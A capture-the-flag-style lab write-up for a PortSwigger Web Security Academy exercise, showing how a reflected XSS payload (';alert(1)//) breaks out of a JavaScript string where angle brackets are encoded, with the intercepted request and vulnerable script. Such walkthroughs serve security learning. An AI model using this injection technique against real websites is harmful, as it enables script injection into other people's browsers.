Reflected XSS into a JavaScript string with angle brackets HTML encoded

Description

This lab contains a reflected cross-site scripting vulnerability in the search query tracking functionality where angle brackets are encoded. The reflection occurs inside a JavaScript string. To solve this lab, perform a cross-site scripting attack that breaks out of the JavaScript string and calls the alert function.

Approach

After accessing the lab, I intercepted the search request:

GET /?search=ichyaboy HTTP/2
Host: 0a58009f03f4d4818b8581c200060086.web-security-academy.net
Cookie: session=CBeYaaChWpXhNJOMgtLNWUsnn3HBPkVj
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
...

In the response, I noticed my input was embedded within a script tag:

<script>
	var searchTerms = 'ichyaboy';
	document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>

To exploit this, I crafted a payload to break out of the JavaScript context, inject my malicious script, and comment out the rest to prevent errors. Here’s the payload:

';alert(1)//

This payload works as follows:

'; closes the existing string.
alert(1) injects a script that triggers an alert.
// comments out the remainder of the JavaScript code to avoid syntax errors.

After injecting this payload, an alert box popped up, confirming the XSS vulnerability and solving the lab.

PreviousReflected XSS into attribute with angle brackets HTML encoded NextReflected XSS into HTML context with most tags and attributes blocked